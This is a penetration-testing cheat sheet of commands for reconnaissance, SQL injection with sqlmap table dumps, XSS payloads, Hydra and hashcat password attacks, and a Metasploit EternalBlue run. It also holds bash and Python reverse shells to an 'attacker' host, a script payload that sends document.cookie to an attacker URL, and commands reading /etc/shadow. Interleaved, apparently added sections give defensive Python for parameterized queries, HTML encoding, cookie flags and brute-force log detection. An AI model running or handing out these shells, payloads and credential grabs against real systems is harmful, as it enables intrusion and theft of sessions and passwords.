Pentester Cheat Sheet
Reconnaissance, exploitation, and security testing quick reference.
Quick Reference
# Quick recon
nmap -sV -sC -oA initial_scan target
# Web enumeration
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
# Check for SQLi
sqlmap -u "http://target/page?id=1" --batch
Reconnaissance
Passive Recon
# DNS enumeration
dig target.com ANY
dig target.com MX
dig target.com NS
host -t ns target.com
# WHOIS
whois target.com
# Subdomain discovery
subfinder -d target.com
amass enum -d target.com
# Certificate transparency
curl "https://crt.sh/?q=%.target.com&output=json" | jq .
Active Recon
# Port scan
nmap -sV -sC target
nmap -p- -T4 target
nmap -sU --top-ports 100 target
# Service version
nmap -sV --version-intensity 5 target
# OS detection
nmap -O target
# Vuln scan
nmap --script vuln target
Web Application
Directory/File Enumeration
# Gobuster
gobuster dir -u http://target -w wordlist.txt -x php,txt,html
# Feroxbuster
feroxbuster -u http://target -w wordlist.txt
# ffuf
ffuf -u http://target/FUZZ -w wordlist.txt
SQLi Testing
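The sqlmap commands under this heading probe a parameter such as id=1 for one specific defect: the request value being spliced into the SQL text. As an added example, not from the original cheat sheet, here is that defect next to the two fixes a remediation section would ask for, a bound parameter and input validation, using Python's sqlite3 against a constructed in-memory users table; the function names are chosen here.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (id, username, role) VALUES (?, ?, ?)",
        [(1, "alice", "admin"), (2, "bob", "user"), (3, "carol", "user")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """The pattern behind a '?id=1' finding: the request parameter becomes part of the SQL text."""
    query = f"SELECT id, username FROM users WHERE id = {user_id}"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user_id):
    """Bound parameter: the value is sent to the engine as data and is never parsed as SQL."""
    return conn.execute(
        "SELECT id, username FROM users WHERE id = ?", (user_id,)
    ).fetchall()


def lookup_validated(conn, raw_id):
    """Defence in depth: reject anything that is not a plain integer before it reaches the query."""
    if not raw_id.isdigit():
        raise ValueError(f"rejected non-numeric id: {raw_id!r}")
    return lookup_parameterized(conn, int(raw_id))


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, id=1:", lookup_vulnerable(conn, "1"))
    print("vulnerable, boolean tautology:", lookup_vulnerable(conn, "1 OR 1=1"))
    print("parameterized, same input:", lookup_parameterized(conn, "1 OR 1=1"))
```

The parameterized query returns nothing for the tautology because the whole string is compared as a value against the integer column; the validated wrapper goes one step further and refuses the input before any query runs, which is also the point at which to log the attempt.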
# SQLMap
sqlmap -u "http://target/page?id=1" --dbs
sqlmap -u "http://target/page?id=1" -D database --tables
sqlmap -u "http://target/page?id=1" -D database -T users --dump
# POST request
sqlmap -u "http://target/login" --data="user=admin&pass=test" --dbs
# Cookie-based
sqlmap -u "http://target/" --cookie="session=abc123" --dbs
XSS Testing
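The payloads under this heading only fire where user-supplied text reaches the page without encoding, and the cookie-stealing variant only works when the session cookie is readable from script. As an added example, not from the original cheat sheet, the following Python renders a user comment with and without HTML encoding, feeds the page's own test payloads through both, and checks a Set-Cookie header for the flags that block the cookie read; the function names and the sample headers are chosen here.

```python
import html

# The test payloads listed on this page, used here only as input to the encoder.
PAYLOADS = [
    "<script>alert('XSS')</script>",
    "<img src=x onerror=alert('XSS')>",
    "<svg onload=alert('XSS')>",
]


def render_comment_unsafe(text):
    """Vulnerable: the comment is concatenated straight into the HTML body."""
    return f'<div class="comment">{text}</div>'


def render_comment_safe(text):
    """Hardened: HTML-encode for the element-content context; quote=True also covers attribute values."""
    return f'<div class="comment">{html.escape(text, quote=True)}</div>'


def contains_markup(rendered):
    """True when the user-controlled part of the rendered HTML still contains a tag delimiter."""
    inner = rendered[len('<div class="comment">'):-len("</div>")]
    return "<" in inner or ">" in inner


def cookie_flag_gaps(set_cookie_header):
    """Hardening flags missing from a Set-Cookie header. HttpOnly keeps document.cookie from
    exposing the value to script; Secure and SameSite limit where the browser sends it."""
    attrs = {part.strip().split("=", 1)[0].lower() for part in set_cookie_header.split(";")[1:]}
    return [flag for flag in ("HttpOnly", "Secure", "SameSite") if flag.lower() not in attrs]


if __name__ == "__main__":
    for p in PAYLOADS:
        print("unsafe:", render_comment_unsafe(p))
        print("safe:  ", render_comment_safe(p))
    # Constructed headers: a weak session cookie and a hardened one.
    print(cookie_flag_gaps("session=abc123; Path=/"))
    print(cookie_flag_gaps("session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax"))
```

html.escape is the right encoder for text placed between tags or inside a quoted attribute; text placed into a URL, a script block or a CSS value needs the encoder for that context instead, and a finding should name which context the injection landed in.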
// Basic payloads
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
// Cookie stealing
<script>document.location='http://attacker/steal?c='+document.cookie</script>
Password Attacks
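The Hydra runs listed under Brute Force below leave a dense trail of failed logins in the target's auth log, which is also what a blue team should be alerting on. As an added example, not from the original cheat sheet, here is a detector that reads sshd lines in the traditional auth.log format and flags any source that exceeds a failure threshold inside a sliding time window. The log lines are constructed samples, the threshold and window are assumed values, and the function names are chosen here.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd lines in syslog / auth.log format (year omitted, as syslog does).
SAMPLE_AUTH_LOG = """\
Mar 10 12:00:01 host sshd[2311]: Failed password for invalid user admin from 203.0.113.9 port 51002 ssh2
Mar 10 12:00:02 host sshd[2313]: Failed password for invalid user admin from 203.0.113.9 port 51004 ssh2
Mar 10 12:00:02 host sshd[2315]: Failed password for admin from 203.0.113.9 port 51006 ssh2
Mar 10 12:00:03 host sshd[2317]: Failed password for admin from 203.0.113.9 port 51008 ssh2
Mar 10 12:00:03 host sshd[2319]: Failed password for admin from 203.0.113.9 port 51010 ssh2
Mar 10 12:00:04 host sshd[2321]: Failed password for admin from 203.0.113.9 port 51012 ssh2
Mar 10 12:01:10 host sshd[2400]: Failed password for alice from 198.51.100.4 port 40210 ssh2
Mar 10 12:01:30 host sshd[2402]: Accepted password for alice from 198.51.100.4 port 40212 ssh2
Mar 10 12:45:00 host sshd[2500]: Failed password for bob from 198.51.100.4 port 40300 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_line(line, year=2024):
    """One sshd auth line to a dict, or None for lines that are not password attempts.
    Syslog omits the year, so the caller supplies it (assumed here)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "src": m["src"]}


def find_bruteforce(log_text, threshold=5, window_seconds=60):
    """Sources with at least `threshold` failed logins inside any `window_seconds` span.
    Both limits are assumed values; tune them to the site's normal failure rate."""
    recent = defaultdict(deque)   # src -> timestamps of failures still inside the window
    users = defaultdict(set)      # src -> usernames tried
    flagged = {}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None or ev["result"] != "Failed":
            continue
        q = recent[ev["src"]]
        q.append(ev["ts"])
        while (ev["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()  # slide the window forward
        users[ev["src"]].add(ev["user"])
        if len(q) >= threshold and ev["src"] not in flagged:
            flagged[ev["src"]] = {
                "first_seen": q[0],
                "failures_in_window": len(q),
                "users": sorted(users[ev["src"]]),
            }
    return flagged


if __name__ == "__main__":
    for src, info in find_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"{src}: {info['failures_in_window']} failures from {info['first_seen']} "
              f"against {', '.join(info['users'])}")
```

A single failure from a legitimate user followed by a success is left alone, and two failures forty minutes apart stay under the threshold, which is the behaviour to check before wiring a detector like this to an automatic block.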
Brute Force
# Hydra - SSH
hydra -l admin -P passwords.txt target ssh
# Hydra - HTTP POST
hydra -l admin -P passwords.txt target http-post-form \
"/login:user=^USER^&pass=^PASS^:Invalid"
# John the Ripper
john --wordlist=rockyou.txt hashes.txt
john --show hashes.txt
# Hashcat
hashcat -m 0 hashes.txt rockyou.txt # MD5
hashcat -m 1000 hashes.txt rockyou.txt # NTLM
Hash Identification
# Identify hash type
hash-identifier
hashid hash.txt
# Common formats
# MD5: 32 hex chars
# SHA1: 40 hex chars
# SHA256: 64 hex chars
# NTLM: 32 hex chars (same length and charset as MD5; length alone cannot tell them apart, so use where the hash came from)
Exploitation
Metasploit
# Start
msfconsole
# Search
search eternalblue
search type:exploit platform:windows
# Use exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST attacker_ip
exploit
Shells
# Reverse shell (bash)
bash -i >& /dev/tcp/attacker/4444 0>&1
# Reverse shell (python)
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]);'
# Listener
nc -lvnp 4444
# Upgrade shell
python -c 'import pty; pty.spawn("/bin/bash")'
Post Exploitation
# Linux
whoami && id
cat /etc/passwd
cat /etc/shadow
find / -perm -4000 2>/dev/null # SUID
sudo -l
# Windows
whoami /priv
net user
net localgroup administrators
Reporting Template
## Finding: [Vulnerability Name]
**Severity:** Critical/High/Medium/Low
**CVSS Score:** X.X
### Description
Brief description of the vulnerability.
### Impact
What an attacker could do.
### Proof of Concept
Steps to reproduce with evidence.
### Remediation
How to fix the issue.
Tags: pentesting, penetration testing, exploitation, recon, security testing